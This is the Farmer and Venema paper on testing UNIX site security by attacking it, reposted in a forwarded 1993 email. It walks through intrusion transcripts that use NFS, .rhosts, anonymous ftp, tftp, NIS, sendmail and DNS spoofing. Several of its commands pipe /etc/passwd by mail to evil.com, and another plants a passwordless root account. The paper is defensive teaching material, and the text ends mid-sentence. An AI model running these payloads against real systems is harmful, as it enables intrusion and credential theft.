Dan Farmer’s Improving the Security of Your Site by Breaking Into It

>From annaliza@netcom.com Ukn Dec 1 23:30:29 1993
Received: from mail.netcom.com (netcom3.netcom.com [192.100.81.103]) by kaiwan.kaiwan.com (8.6.4/8.6.4) with ESMTP
id XAA29728 for ; Wed, 1 Dec 1993 23:30:04 -0800
*** Knowledge Added Information Wide Area Network ***
Received: from localhost by mail.netcom.com (8.6.4/SMI-4.1/Netcom)
id XAA16337; Wed, 1 Dec 1993 23:30:12 -0800
From: annaliza@netcom.com (Annaliza T. Orquamada)
Message-Id: <199312020730.XAA16337@mail.netcom.com>
Subject: I posted it…. (fwd)
To: budds@kaiwan.com
Date: Wed, 1 Dec 93 23:30:12 PST
X-Mailer: ELM [version 2.3 PL11]
Status: RO
X-Status:

Forwarded message:
>From Dan.Farmer@Corp.Sun.COM Wed Dec 1 20:03:15 1993
Message-Id: <9312020405.AA01850@death.corp.sun.com.corp.sun.com>
To: annaliza@netcom.com
Subject: I posted it….
Date: Wed, 01 Dec 93 20:05:23 -0800
From: Dan <Dan.Farmer@Corp.Sun.COM>

This is absolutely the real thing 🙂

*kiss*

dan

_Improving the Security of Your Site by Breaking Into it_

Dan Farmer Wietse Venema
Sun Microsystems Eindhoven University of Technology
zen@sun.com wietse@wzv.win.tue.nl

Introduction
————

Every day, all over the world, computer networks and hosts are being
broken into. The level of sophistication of these attacks varies
widely; while it is generally believed that most break-ins succeed due
to weak passwords, there are still a large number of intrusions that use
more advanced techniques to break in. Less is known about the latter
types of break-ins, because by their very nature they are much harder to
detect.

—–

CERT. SRI. The Nic. NCSC. RSA. NASA. MIT. Uunet. Berkeley.
Purdue. Sun. You name it, we’ve seen it broken into. Anything that is
on the Internet (and many that isn’t) seems to be fairly easy game. Are
these targets unusual? What happened?

Fade to…

A young boy, with greasy blonde hair, sitting in a dark room. The room
is illuminated only by the luminescense of the C64’s 40 character
screen. Taking another long drag from his Benson and Hedges cigarette,
the weary system cracker telnets to the next faceless “.mil” site on his
hit list. “guest — guest”, “root — root”, and “system — manager” all
fail. No matter. He has all night… he pencils the host off of his
list, and tiredly types in the next potential victim…

This seems to be the popular image of a system cracker. Young,
inexperienced, and possessing vast quantities of time to waste, to get
into just one more system. However, there is a far more dangerous type
of system cracker out there. One who knows the ins and outs of the
latest security auditing and cracking tools, who can modify them for
specific attacks, and who can write his/her own programs. One who not
only reads about the latest security holes, but also personally
discovers bugs and vulnerabilities. A deadly creature that can both
strike poisonously and hide its tracks without a whisper or hint of a
trail. The uebercracker is here.

—–

Why “uebercracker”? The idea is stolen, obviously, from Nietzsche’s
uebermensch, or, literally translated into English, “over man.”
Nietzsche used the term not to refer to a comic book superman, but
instead a man who had gone beyond the incompetence, pettiness, and
weakness of the everyday man. The uebercracker is therefore the system
cracker who has gone beyond simple cookbook methods of breaking into
systems. An uebercracker is not usually motivated to perform random
acts of violence. Targets are not arbitrary — there is a purpose,
whether it be personal monetary gain, a hit and run raid for
information, or a challenge to strike a major or prestigious site or
net.personality. An uebercracker is hard to detect, harder to stop, and
hardest to keep out of your site for good.

Overview
——–

In this paper we will take an unusual approach to system security.
Instead of merely saying that something is a problem, we will look
through the eyes of a potential intruder, and show _why_ it is one. We
will illustrate that even seemingly harmless network services can become
valuable tools in the search for weak points of a system, even when
these services are operating exactly as they are intended to.

In an effort to shed some light on how more advanced intrusions occur,
this paper outlines various mechanisms that crackers have actually used
to obtain access to systems and, in addition, some techniques we either
suspect intruders of using, or that we have used ourselves in tests or
in friendly/authorized environments.

Our motivation for writing this paper is that system administrators are
often unaware of the dangers presented by anything beyond the most
trivial attacks. While it is widely known that the proper level of
protection depends on what has to be protected, many sites appear to
lack the resources to assess what level of host and network security is
adequate. By showing what intruders can do to gain access to a remote
site, we are trying to help system administrators to make _informed_
decisions on how to secure their site — or not. We will limit the
discussion to techniques that can give a remote intruder access to a
(possibly non-interactive) shell process on a UNIX host. Once this is
achieved, the details of obtaining root privilege are beyond the scope
of this work — we consider them too site-dependent and, in many cases,
too trivial to merit much discussion.

We want to stress that we will not merely run down a list of bugs or
security holes — there will always be new ones for a potential attacker
to exploit. The purpose of this paper is to try to get the reader to
look at her or his system in a new way — one that will hopefully afford
him or her the opportunity to _understand_ how their system can be
compromised, and how.

We would also like to reiterate to the reader that the purpose of this
paper is to show you how to test the security of your own site, not how
to break into other people’s systems. The intrusion techniques we
illustrate here will often leave traces in your system auditing logs —
it might be constructive to examine them after trying some of these
attacks out, to see what a real attack might look like. Certainly other
sites and system administrators will take a very dim view of your
activities if you decide to use their hosts for security testing without
advance authorization; indeed, it is quite possible that legal action
may be pursued against you if they perceive it as an attack.

There are four main parts to the paper. The first part is the
introduction and overview. The second part attempts to give the reader
a feel for what it is like to be an intruder and how to go from knowing
nothing about a system to compromising its security. This section goes
over actual techniques to gain information and entrance and covers basic
strategies such as exploiting trust and abusing improperly configured
basic network services (ftp, mail, tftp, etc.) It also discusses
slightly more advanced topics, such as NIS and NFS, as well as various
common bugs and configuration problems that are somewhat more OS or
system specific. Defensive strategies against each of the various
attacks are also covered here.

The third section deals with trust: how the security of one system
depends on the integrity of other systems. Trust is the most complex
subject in this paper, and for the sake of brevity we will limit the
discussion to clients in disguise.

The fourth section covers the basic steps that a system administrator
may take to protect her or his system. Most of the methods presented
here are merely common sense, but they are often ignored in practice —
one of our goals is to show just how dangerous it can be to ignore basic
security practices.

Case studies, pointers to security-related information, and software are
described in the appendices at the end of the paper.

While exploring the methods and strategies discussed in this paper we we
wrote SATAN (Security Analysis Tool for Auditing Networks.) Written in
shell, perl, expect and C, it examines a remote host or set of hosts and
gathers as much information as possible by remotely probing NIS, finger,
NFS, ftp and tftp, rexd, and other services. This information includes
the presence of various network information services as well as
potential security flaws — usually in the form of incorrectly setup or
configured network services, well-known bugs in system or network
utilities, or poor or ignorant policy decisions. It then can either
report on this data or use an expert system to further investigate any
potential security problems. While SATAN doesn’t use all of the methods
that we discuss in the paper, it has succeeded with ominous regularity
in finding serious holes in the security of Internet sites. It will be
posted and made available via anonymous ftp when completed; Appendix A
covers its salient features.

Note that it isn’t possible to cover all possible methods of breaking
into systems in a single paper. Indeed, we won’t cover two of the most
effective methods of breaking into hosts: social engineering and
password cracking. The latter method is so effective, however, that
several of the strategies presented here are geared towards acquiring
password files. In addition, while windowing systems (X, OpenWindows,
etc.) can provide a fertile ground for exploitation, we simply don’t
know many methods that are used to break into remote systems. Many
system crackers use non-bitmapped terminals which can prevent them from
using some of the more interesting methods to exploit windowing systems
effectively (although being able to monitor the victim’s keyboard is
often sufficient to capture passwords). Finally, while worms, viruses,
trojan horses, and other malware are very interesting, they are not
common (on UNIX systems) and probably will use similar techniques to the
ones we describe in this paper as individual parts to their attack
strategy.

Gaining Information
——————-

Let us assume that you are the head system administrator of Victim
Incorporated’s network of UNIX workstations. In an effort to secure
your machines, you ask a friendly system administrator from a nearby
site (evil.com) to give you an account on one of her machines so that
you can look at your own system’s security from the outside.

What should you do? First, try to gather information about your
(target) host. There is a wealth of network services to look at:
finger, showmount, and rpcinfo are good starting points. But don’t stop
there — you should also utilize DNS, whois, sendmail (smtp), ftp, uucp,
and as many other services as you can find. There are so many methods
and techniques that space precludes us from showing all of them, but we
will try to show a cross-section of the most common and/or dangerous
strategies that we have seen or have thought of. Ideally, you would
gather such information about all hosts on the subnet or area of attack
— information is power — but for now we’ll examine only our intended
target.

To start out, you look at what the ubiquitous finger command shows you
(assume it is 6pm, Nov 6, 1993):

victim % finger @victim.com
[victim.com]
Login Name TTY Idle When Where
zen Dr. Fubar co 1d Wed 08:00 death.com

Good! A single idle user — it is likely that no one will notice if you
actually manage to break in.

Now you try more tactics. As every finger devotee knows, fingering “@”,
“0”, and “”, as well as common names, such as root, bin, ftp, system,
guest, demo, manager, etc., can reveal interesting information. What
that information is depends on the version of finger that your target is
running, but the most notable are account names, along with their home
directories and the host that they last logged in from.

To add to this information, you can use rusers (in particular with the
-l flag) to get useful information on logged-in users.

Trying these commands on victim.com reveals the following information,
presented in a compressed tabular form to save space:

Login Home-dir Shell Last login, from where
—– ——– —– ———————-
root / /bin/sh Fri Nov 5 07:42 on ttyp1 from big.victim.com
bin /bin Never logged in
nobody / Tue Jun 15 08:57 on ttyp2 from server.victim.co
daemon / Tue Mar 23 12:14 on ttyp0 from big.victim.com
sync / /bin/sync Tue Mar 23 12:14 on ttyp0 from big.victim.com
zen /home/zen /bin/bash On since Wed Nov 6 on ttyp3 from death.com
sam /home/sam /bin/csh Wed Nov 5 05:33 on ttyp3 from evil.com
guest /export/foo /bin/sh Never logged in
ftp /home/ftp Never logged in

Both our experiments with SATAN and watching system crackers at work
have proved to us that finger is one of the most dangerous services,
because it is so useful for investigating a potential target. However,
much of this information is useful only when used in conjunction with
other data.

For instance, running showmount on your target reveals:

evil % showmount -e victim.com
export list for victim.com:
/export (everyone)
/var (everyone)
/usr easy
/export/exec/kvm/sun4c.sunos.4.1.3 easy
/export/root/easy easy
/export/swap/easy easy

Note that /export/foo is exported to the world; also note that this is
user guest’s home directory. Time for your first break-in! In this
case, you’ll mount the home directory of user “guest.” Since you don’t
have a corresponding account on the local machine and since root cannot
modify files on an NFS mounted filesystem, you create a “guest” account
in your local password file. As user guest you can put an .rhosts entry
in the remote guest home directory, which will allow you to login to the
target machine without having to supply a password.

evil # mount victim.com:/export/foo /foo
evil # cd /foo
evil # ls -lag
total 3
1 drwxr-xr-x 11 root daemon 512 Jun 19 09:47 .
1 drwxr-xr-x 7 root wheel 512 Jul 19 1991 ..
1 drwx–x–x 9 10001 daemon 1024 Aug 3 15:49 guest
evil # echo guest:x:10001:1:temporary breakin account:/: >> /etc/passwd
evil # ls -lag
total 3
1 drwxr-xr-x 11 root daemon 512 Jun 19 09:47 .
1 drwxr-xr-x 7 root wheel 512 Jul 19 1991 ..
1 drwx–x–x 9 guest daemon 1024 Aug 3 15:49 guest
evil # su guest
evil % echo victim.com >> guest/.rhosts
evil % rlogin victim.com
Welcome to victim.com!
victim %

If, instead of home directories, victim.com were exporting filesystems
with user commands (say, /usr or /usr/local/bin), you could replace a
command with a trojan horse that executes any command of your choice.
The next user to execute that command would execute your program.

We suggest that filesystems be exported:

o Read/write only to specific, trusted clients.
o Read-only, where possible (data or programs can often be
exported in this manner.)

If the target has a “+” wildcard in its /etc/hosts.equiv (the default in
various vendor’s machines) or has the netgroups bug (CERT advisory
91:12), any non-root user with a login name in the target’s password
file can rlogin to the target without a password. And since the user
“bin” often owns key files and directories, your next attack is to try
to log in to the target host and modify the password file to let you
have root access:

evil % whoami
bin
evil % rsh victim.com csh -i
Warning: no access to tty; thus no job control in this shell…
victim % ls -ldg /etc
drwxr-sr-x 8 bin staff 2048 Jul 24 18:02 /etc
victim % cd /etc
victim % mv passwd pw.old
victim % (echo toor::0:1:instant root shell:/:/bin/sh; cat pw.old ) > passwd
victim % ^D
evil % rlogin victim.com -l toor
Welcome to victim.com!
victim #

A few notes about the method used above; “rsh victim.com csh -i” is used
to initially get onto the system because it doesn’t leave any traces in
the wtmp or utmp system auditing files, making the rsh invisible for
finger and who. The remote shell isn’t attached to a pseudo-terminal,
however, so that screen-oriented programs such as pagers and editors
will fail — but it is very handy for brief exploration.

The COPS security auditing tool (see appendix D) will report key files
or directories that are writable to accounts other than the
superuser. If you run SunOS 4.x you can apply patch 100103 to fix most
file permission problems. On many systems, rsh probes as shown above,
even when successful, would remain completely unnoticed; the tcp wrapper
(appendix D), which logs incoming connections, can help to expose such
activities.

—-

What now? Have you uncovered all the holes on your target system? Not
by a long shot. Going back to the finger results on your target, you
notice that it has an “ftp” account, which usually means that anonymous
ftp is enabled. Anonymous ftp can be an easy way to get access, as it
is often misconfigured. For example, the target may have a complete
copy of the /etc/passwd file in the anonymous ftp ~ftp/etc directory
instead of a stripped down version. In this example, though, you see
that the latter doesn’t seem to be true (how can you tell without
actually examining the file?) However, the home directory of ftp on
victim.com is writable. This allows you to remotely execute a command
— in this case, mailing the password file back to yourself — by the
simple method of creating a .forward file that executes a command when
mail is sent to the ftp account. This is the same mechanism of piping
mail to a program that the “vacation” program uses to automatically
reply to mail messages.

evil % cat forward_sucker_file
“|/bin/mail zen@evil.com < /etc/passwd" evil % ftp victim.com Connected to victim.com 220 victim FTP server ready. Name (victim.com:zen): ftp 331 Guest login ok, send ident as password. Password: 230 Guest login ok, access restrictions apply. ftp> ls -lga
200 PORT command successful.
150 ASCII data connection for /bin/ls (192.192.192.1,1129) (0 bytes).
total 5
drwxr-xr-x 4 101 1 512 Jun 20 1991 .
drwxr-xr-x 4 101 1 512 Jun 20 1991 ..
drwxr-xr-x 2 0 1 512 Jun 20 1991 bin
drwxr-xr-x 2 0 1 512 Jun 20 1991 etc
drwxr-xr-x 3 101 1 512 Aug 22 1991 pub
226 ASCII Transfer complete.
242 bytes received in 0.066 seconds (3.6 Kbytes/s)
ftp> put forward_sucker_file .forward
43 bytes sent in 0.0015 seconds (28 Kbytes/s)
ftp> quit
evil % echo test | mail ftp@victim.com

Now you simply wait for the password file to be sent back to you.

The security auditing tool COPS will check your anonymous ftp setup; see
the man page for ftpd, the documentation/code for COPS, or CERT advisory
93:10 for information on how to set up anonymous ftp correctly.
Vulnerabilities in ftp are often a matter of incorrect ownership or
permissions of key files or directories. At the very least, make sure
that ~ftp and all “system” directories and files below ~ftp are owned by
root and are not writable by any user.

While looking at ftp, you can check for an older bug that was once
widely exploited:

% ftp -n
ftp> open victim.com
Connected to victim.com
220 victim.com FTP server ready.
ftp> quote user ftp
331 Guest login ok, send ident as password.
ftp> quote cwd ~root
530 Please login with USER and PASS.
ftp> quote pass ftp
230 Guest login ok, access restrictions apply.
ftp> ls -al / (or whatever)

If this works, you now are logged in as root, and able to modify the
password file, or whatever you desire. If your system exhibits this
bug, you should definitely get an update to your ftpd daemon, either
from your vendor or (via anon ftp) from ftp.uu.net.

The wuarchive ftpd, a popular replacement ftp daemon put out by the
Washington University in Saint Louis, had almost the same problem. If
your wuarchive ftpd pre-dates April 8, 1993, you should replace it by a
more recent version.

Finally, there is a program vaguely similar to ftp — tftp, or the
trivial file transfer program. This daemon doesn’t require any password
for authentication; if a host provides tftp without restricting the
access (usually via some secure flag set in the inetd.conf file), an
attacker can read and write files anywhere on the system. In the
example, you get the remote password file and place it in your local
/tmp directory:

evil % tftp
tftp> connect victim.com
tftp> get /etc/passwd /tmp/passwd.victim
tftp> quit

For security’s sake, tftp should not be run; if tftp is necessary, use
the secure option/flag to restrict access to a directory that has no
valuable information, or run it under the control of a chroot wrapper
program.

—-

If none of the previous methods have worked, it is time to go on to more
drastic measures. You have a friend in rpcinfo, another very handy
program, sometimes even more useful than finger. Many hosts run RPC
services that can be exploited; rpcinfo can talk to the portmapper and
show you the way. It can tell you if the host is running NIS, if it is
a NIS server or slave, if a diskless workstation is around, if it is
running NFS, any of the info services (rusersd, rstatd, etc.), or any
other unusual programs (auditing or security related). For instance,
going back to our sample target:

evil % rpcinfo -p victim.com [output trimmed for brevity’s sake]
program vers proto port
100004 2 tcp 673 ypserv
100005 1 udp 721 mountd
100003 2 udp 2049 nfs
100026 1 udp 733 bootparam
100017 1 tcp 1274 rexd

In this case, you can see several significant facts about our target;
first of which is that it is an NIS server. It is perhaps not widely
known, but once you know the NIS domainname of a server, you can get any
of its NIS maps by a simple rpc query, even when you are outside the
subnet served by the NIS server (for example, using the YPX program that
can be found in the comp.sources.misc archives on ftp.uu.net). In
addition, very much like easily guessed passwords, many systems use
easily guessed NIS domainnames. Trying to guess the NIS domainname is
often very fruitful. Good candidates are the fully and partially
qualified hostname (e.g. “victim” and “victim.com”), the organization
name, netgroup names in “showmount” output, and so on. If you wanted to
guess that the domainname was “victim”, you could type:

evil % ypwhich -d victim victim.com
Domain victim not bound.

This was an unsuccessful attempt; if you had guessed correctly it would
have returned with the host name of victim.com’s NIS server. However,
note from the NFS section that victim.com is exporting the “/var”
directory to the world. All that is needed is to mount this directory
and look in the “yp” subdirectory — among other things you will see
another subdirectory that contains the domainname of the target.

evil # mount victim.com:/var /foo
evil # cd /foo
evil # /bin/ls -alg /foo/yp
total 17
1 drwxr-sr-x 4 root staff 512 Jul 12 14:22 .
1 drwxr-sr-x 11 root staff 512 Jun 29 10:54 ..
11 -rwxr-xr-x 1 root staff 10993 Apr 22 11:56 Makefile
1 drwxr-sr-x 2 root staff 512 Apr 22 11:20 binding
2 drwxr-sr-x 2 root staff 1536 Jul 12 14:22 foo_bar
[…]

In this case, “foo_bar” is the NIS domain name.

In addition, the NIS maps often contain a good list of user/employee
names as well as internal host lists, not to mention passwords for
cracking.

Appendix C details the results of a case study on NIS password files.

—-

You note that the rpcinfo output also showed that victim.com runs rexd.
Like the rsh daemon, rexd processes requests of the form “please execute
this command as that user”. Unlike rshd, however, rexd does not care if
the client host is in the hosts.equiv or .rhost files. Normally the rexd
client program is the “on” command, but it only takes a short C program
to send arbitrary client host and userid information to the rexd server;
rexd will happily execute the command. For these reasons, running rexd
is similar to having no passwords at all: all security is in the client,
not in the server where it should be. Rexd security can be improved
somewhat by using secure RPC.

—-

While looking at the output from rpcinfo, you observe that victim.com
also seems to be a server for diskless workstations. This is evidenced
by the presence of the bootparam service, which provides information to
the diskless clients for booting. If you ask nicely, using
BOOTPARAMPROC_WHOAMI and provide the address of a client, you can get
its NIS domainname. This can be very useful when combined with the fact
that you can get arbitrary NIS maps (such as the password file) when you
know the NIS domainname. Here is a sample code snippet to do just that
(bootparam is part of SATAN.)

char *server;
struct bp_whoami_arg arg; /* query */
struct bp_whoami_res res; /* reply */

/* initializations omitted… */

callrpc(server, BOOTPARAMPROG, BOOTPARAMVERS, BOOTPARAMPROC_WHOAMI,
xdr_bp_whoami_arg, &arg, xdr_bp_whoami_res, &res);

printf(“%s has nisdomain %s\n”, server, res.domain_name);

The showmount output indicated that “easy” is a diskless client of
victim.com, so we use its client address in the BOOTPARAMPROC_WHOAMI
query:

evil % bootparam victim.com easy.victim.com
victim.com has nisdomain foo_bar

—-

NIS masters control the mail aliases for the NIS domain in question.
Just like local mail alias files, you can create a mail alias that will
execute commands when mail is sent to it (a once popular example of this
is the “decode” alias which uudecodes mail files sent to it.) For
instance, here you create an alias “foo”, which mails the password file
back to evil.com by simply mailing any message to it:

nis-master # echo ‘foo: “| mail zen@evil.com < /etc/passwd "' >> /etc/aliases
nis-master # cd /var/yp
nis-master # make aliases
nis-master # echo test | mail -v foo@victim.com

Hopefully attackers won’t have control of your NIS master host, but even
more hopefully the lesson is clear — NIS is normally insecure, but if
an attacker has control of your NIS master, then s/he effectively has
control of the client hosts (e.g. can execute arbitrary commands).

There aren’t many effective defenses against NIS attacks; it is an
insecure service that has almost no authentication between clients and
servers. To make things worse, it seems fairly clear that arbitrary
maps can be forced onto even master servers (e.g., it is possible to
treat an NIS server as a client). This, obviously, would subvert the
entire schema. If it is absolutely necessary to use NIS, choosing a
hard to guess domainname can help slightly, but if you run diskless
clients that are exposed to potential attackers then it is trivial for
an attacker to defeat this simple step by using the bootparam trick to
get the domainname. If NIS is used to propagate the password maps, then
shadow passwords do not give additional protection because the shadow
map is still accessible to any attacker that has root on an attacking
host. Better is to use NIS as little as possible, or to at least
realize that the maps can be subject to perusal by potentially hostile
forces.

Secure RPC goes a long way to diminish the threat, but it has its own
problems, primarily in that it is difficult to administer, but also in
that the cryptographic methods used within are not very strong. It has
been rumored that NIS+, Sun’s new network information service, fixes
some of these problems, but until now it has been limited to running on
Suns, and thus far has not lived up to the promise of the design.
Finally, using packet filtering (at the very least port 111) or
securelib (see appendix D), or, for Suns, applying Sun patch 100482-02
all can help.

—-

The portmapper only knows about RPC services. Other network services
can be located with a brute-force method that connects to all network
ports. Many network utilities and windowing systems listen to specific
ports (e.g. sendmail is on port 25, telnet is on port 23, X windows is
usually on port 6000, etc.) SATAN includes a program that scans the
ports of a remote hosts and reports on its findings; if you run it
against our target, you see:

evil % tcpmap victim.com
Mapping 128.128.128.1
port 21: ftp
port 23: telnet
port 25: smtp
port 37: time
port 79: finger
port 512: exec
port 513: login
port 514: shell
port 515: printer
port 6000: (X)

This suggests that victim.com is running X windows. If not protected
properly (via the magic cookie or xhost mechanisms), window displays can
be captured or watched, user keystrokes may be stolen, programs executed
remotely, etc. Also, if the target is running X and accepts a telnet to
port 6000, that can be used for a denial of service attack, as the
target’s windowing system will often “freeze up” for a short period of
time. One method to determine the vulnerability of an X server is to
connect to it via the XOpenDisplay() function; if the function returns
NULL then you cannot access the victim’s display (opendisplay is part of
SATAN):

char *hostname;

if (XOpenDisplay(hostname) == NULL) {
printf(“Cannot open display: %s\n”, hostname);
} else {
printf(“Can open display: %s\n”, hostname);
}

evil % opendisplay victim.com:0
Cannot open display: victim.com:0

X terminals, though much less powerful than a complete UNIX system, can
have their own security problems. Many X terminals permit unrestricted
rsh access, allowing you to start X client programs in the victim’s
terminal with the output appearing on your own screen:

evil % xhost +xvictim.victim.com
evil % rsh xvictim.victim.com telnet victim.com -display evil.com

In any case, give as much thought to your window security as your
filesystem and network utilities, for it can compromise your system as
surely as a “+” in your hosts.equiv or a passwordless (root) account.

—-

Next, you examine sendmail. Sendmail is a very complex program that has
a long history of security problems, including the infamous “wiz”
command (hopefully long since disabled on all machines). You can often
determine the OS, sometimes down to the version number, of the target,
by looking at the version number returned by sendmail. This, in turn,
can give you hints as to how vulnerable it might be to any of the
numerous bugs. In addition, you can see if they run the “decode” alias,
which has its own set of problems:

evil % telnet victim.com 25
connecting to host victim.com (128.128.128.1.), port 25
connection open
220 victim.com Sendmail Sendmail 5.55/victim ready at Fri, 6 Nov 93 18:00 PDT
expn decode
250 <"|/usr/bin/uudecode">
quit

Running the “decode” alias is a security risk — it allows potential
attackers to overwrite any file that is writable by the owner of that
alias — often daemon, but potentially any user. Consider this piece of
mail — this will place “evil.com” in user zen’s .rhosts file if it is
writable:

evil % echo “evil.com” | uuencode /home/zen/.rhosts | mail decode@victim.com

If no home directories are known or writable, an interesting variation
of this is to create a bogus /etc/aliases.pag file that contains an
alias with a command you wish to execute on your target. This may work
since on many systems the aliases.pag and aliases.dir files, which
control the system’s mail aliases, are writable to the world.

evil % cat decode
bin: “| cat /etc/passwd | mail zen@evil.com”
evil % newaliases -oQ/tmp -oA`pwd`/decode
evil % uuencode decode.pag /etc/aliases.pag | mail decode@victom.com
evil % /usr/lib/sendmail -fbin -om -oi bin@victim.com < /dev/null A lot of things can be found out by just asking sendmail if an address is acceptable (vrfy), or what an address expands to (expn). When the finger or rusers services are turned off, vrfy and expn can still be used to identify user accounts or targets. Vrfy and expn can also be used to find out if the user is piping mail through any program that might be exploited (e.g. vacation, mail sorters, etc.). It can be a good idea to disable the vrfy and expn commands: in most versions, look at the source file srvrsmtp.c, and either delete or change the two lines in the CmdTab structure that have the strings "vrfy" and "expn". Sites without source can still disable expn and vrfy by just editing the sendmail executable with a binary editor and replacing "vrfy" and "expn" with blanks. Acquiring a recent version of sendmail (see Appendix D) is also an extremely good idea, since there have probably been more security bugs reported in sendmail than in any other UNIX program. ---- As a sendmail-sendoff, there are two fairly well known bugs that should be checked into. The first was definitely fixed in version 5.59 from Berkeley; despite the messages below, for versions of sendmail previous to 5.59, the "evil.com" gets appended, despite the error messages, along with all of the typical mail headers, to the file specified: % cat evil_sendmail telnet victim.com 25 << EOSM rcpt to: /home/zen/.rhosts mail from: zen data random garbage . rcpt to: /home/zen/.rhosts mail from: zen data evil.com . quit EOSM evil % /bin/sh evil_sendmail Trying 128.128.128.1 Connected to victim.com Escape character is '^]'. Connection closed by foreign host. evil % rlogin victim.com -l zen Welcome to victim.com! victim % The second hole, fixed only recently, permitted anyone to specify arbitrary shell commands and/or pathnames for the sender and/or destination address. Attempts to keep details secret were in vain, and extensive discussions in mailing lists and usenet news groups led to disclosure of how to exploit some versions of the bug. As with many UNIX bugs, nearly every vendor's sendmail was vulnerable to the problem, since they all share a common source code tree ancestry. Space precludes us from discussing it fully, but a typical attack to get the password file might look like this: evil % telnet victim.com 25 Trying 128.128.128.1... Connected to victim.com Escape character is '^]'. 220 victim.com Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04 mail from: "|/bin/mail zen@evil.com < /etc/passwd" 250 "|/bin/mail zen@evil.com < /etc/passwd"... Sender ok rcpt to: nosuchuser 550 nosuchuser... User unknown data 354 Enter mail, end with "." on a line by itself . 250 Mail accepted quit Connection closed by foreign host. evil % At the time of writing, version 8.6.4 of sendmail (see Appendix D for information on how to get this) is reportedly the only variant of sendmail with all of the recent security bugs fixed. Trust ----- For our final topic of vulnerability, we'll digress from the practical strategy we've followed previously to go a bit more into the theoretical side, and briefly discuss the notion of trust. The issues and implications of vulnerabilities here are a bit more subtle and far-reaching than what we've covered before; in the context of this paper we use the word trust whenever there is a situation when a server (note that any host that allows remote access can be called a server) can permit a local resource to be used by a client without password authentication when password authentication is normally required. In other words, we arbitrarily limit the discussion to clients in disguise. There are many ways that a host can trust: .rhosts and hosts.equiv files that allow access without password verification; window servers that allow remote systems to use and abuse privileges; export files that control access via NFS, and more. Nearly all of these rely on client IP address to hostname conversion to determine whether or not service is to be granted. The simplest method uses the /etc/hosts file for a direct lookup. However, today most hosts use either DNS (the Domain Name Service), NIS, or both for name lookup service. A reverse lookup occurs when a server has an IP address (from a client host connecting to it) and wishes to get the corresponding client hostname. Although the concept of how host trust works is well understood by most system administrators, the _dangers_ of trust, and the _practical_ problem it represents, irrespective of hostname impersonation, is one of the least understood problems we know of on the Internet. This goes far beyond the obvious hosts.equiv and rhosts files; NFS, NIS, windowing systems -- indeed, much of the useful services in UNIX are based on the concept that well known (to an administrator or user) sites are trusted in some way. What is not understood is how networking so tightly binds security between what are normally considered disjoint hosts. Any form of trust can be spoofed, fooled, or subverted, especially when the authority that gets queried to check the credentials of the client is either outside of the server's administrative domain, or when the trust mechanism is based on something that has a weak form of authentication; both are usually the case. Obviously, if the host containing the database (either NIS, DNS, or whatever) has been compromised, the intruder can convince the target host that s/he is coming from any trusted host; it is now sufficient to find out which hosts are trusted by the target. This task is often greatly helped by examining where system administrators and system accounts (such as root, etc.) last logged in from. Going back to our target, victim.com, you note that root and some other system accounts logged in from big.victim.com. You change the PTR record for evil.com so that when you attempt to rlogin in from evil.com to victim.com, victim.com will attempt to look up your hostname and will find what you placed in the record. If the record in the DNS database looks like: 1.192.192.192.in-addr.arpa IN PTR evil.com And you change it to: 1.192.192.192.in-addr.arpa IN PTR big.victim.com then, depending on how naive victim.com's system software is, victim.com will believe the login comes from big.victim.com, and, assuming that big.victim.com is in the /etc/hosts.equiv or /.rhosts files, you will be able to login without supplying a password. With NIS, it is a simple matter of either editing the host database on the NIS master (if this is controlled by the intruder) or of spoofing or forcing NIS (see discussion on NIS security above) to supply the target with whatever information you desire. Although more complex, interesting, and damaging attacks can be mounted via DNS, time and space don't allow coverage of these methods here. Two methods can be used to prevent such attacks. The first is the most direct, but perhaps the most impractical. If your site doesn't use any trust, you won't be as vulnerable to host spoofing. The other strategy is to use cryptographic protocols. Using the secure RPC protocol (used in secure NFS, NIS+, etc.) is one method; although it has been "broken" cryptographically, it still provides better assurance than RPC authentication schemes that do not use any form of encryption. Other solutions, both hardware (smartcards) and software (Kerberos), are being developed, but they are either incomplete or require changes to system software. Appendix B details the results of an informal survey taken from a variety of hosts on the Internet. Protecting the system --------------------- It is our hope that we have demonstrated that even some of the most seemingly innocuous services run can offer (sometimes unexpectedly) ammunition to determined system crackers. But, of course, if security were all that mattered, computers would never be turned on, let alone hooked into a network with literally millions of potential intruders. Rather than reiterating specific advice on what to switch on or off, we instead offer some general suggestions: o If you cannot turn off the finger service, consider installing a modified finger daemon. It is rarely necessary to reveal a user's home directory and the source of last login. o Don't run NIS unless it's absolutely necessary. Use NFS as little as possible. o Never export NFS filesystems unrestricted to the world. Try to export file systems read-only where possible. o Fortify and protect servers (e.g. hosts that provide a service to other hosts -- NFS, NIS, DNS, whatever.) Only allow administrative accounts on these hosts. o Examine carefully services offered by inetd and the portmapper. Eliminate any that aren't explicitly needed. Use Wietse Venema's inetd wrappers, if for no other reason than to log the sources of connections to your host. This adds immeasurably to the standard UNIX auditing features, especially with respect to network attacks. If possible, use the loghost mechanism of syslog to collect security-related information on a secure host. o Eliminate trust unless there is an absolute need for it. Trust is your enemy. o Use shadow passwords and a passwd command that disallows poor passwords. Disable or delete unused/dormant system or user accounts. o Keep abreast of current literature (see our suggested reading list and bibliography at the end of this paper) and security tools; communicate to others about security problems and incidents. At minimum, subscribe to the CERT mailing list and phrack magazine (plus the firewalls mailing list, if your site is using or thinking about installing a firewall) and read the usenet security newsgroups to get the latest information on security problems. Ignorance is the deadliest security problem we are aware of. o Install all vendor security patches as soon as possible, on all of your hosts. Examine security patch information for other vendors - many bugs (rdist, sendmail) are common to many UNIX variants. It is interesting to note that common solutions to security problems such as running Kerberos or using one-time passwords or digital tokens are ineffective against most of the attacks we discuss here. We heartily recommend the use of such systems, but be aware that they are _not_ a total security solution -- they are part of a larger struggle to defend your system. Conclusions ----------- Perhaps none of the methods shown here are surprising; when writing this paper, we didn't learn very much about how to break into systems. What we _did_ learn was, while testing these methods out on our own systems and that of friendly sites, just how effective this set of methods is for gaining access to a typical (UNIX) Internet host. Tiring of trying to type these in all by hand, and desiring to keep our own systems more secure, we decided to implement a security tool (SATAN) that attempts to check remote hosts for at least some of the problems discussed here. The typical response, when telling people about our paper and our tool was something on the order of "that sounds pretty dangerous -- I hope you're not going to give it out to everybody. But you since you can trust me, may I have a copy of it?" We never set out to create a cookbook or toolkit of methods and programs on how to break into systems -- instead, we saw that these same methods were being used, every day, against ourselves and against friendly system administrators. We believe that by propagating information that normally wasn't available to those outside of the underworld, we can increase security by raising awareness. Trying to restrict access to "dangerous" security information has never seemed to be a very effective method for increasing security; indeed, the opposite appears 